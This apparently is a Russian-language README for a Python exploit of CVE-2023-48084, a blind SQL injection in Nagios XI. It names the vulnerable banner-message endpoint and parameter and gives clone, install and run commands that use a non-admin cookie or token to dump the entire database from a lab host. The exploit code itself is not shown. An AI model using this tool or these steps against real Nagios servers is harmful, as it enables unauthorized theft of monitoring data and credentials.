
Python-программа для дампа всех баз данных, эксплуатирующая уязвимость sqli в NagiosXI
Python-эксплойт для CVE-2023-48084 -> Nagios XI before version 5.11.3 was discovered to contain a SQL injection vulnerability via the bulk modification tool.
Эксплойт использует /admin/banner_message-ajaxhelper.php?action=acknowledge_banner_message&id=(<SQL COMMAND TO EXECUTE>) для выполнения SQL-запросов и эксплуатирует слепую SQL-инъекцию...
Склонируйте репозиторий и установите зависимости из requirements.txt
git clone https://github.com/Hamibubu/CVE-2023-48084.git
cd CVE-2023-48084
pip install -r requirements.txt
Теперь запустите программу: вам понадобится сессионная cookie не-администратора или API-токен, например
python3 CVE-2023-48084.py --url https://monitored.htb/nagiosxi -a <token>
python3 CVE-2023-48084.py --url https://monitored.htb/nagiosxi -c <cookie>
По умолчанию программа попытается выгрузить всю базу данных, начиная со схем; если вам нужно быстрее, просто посмотрите код и возьмите нужную вам часть.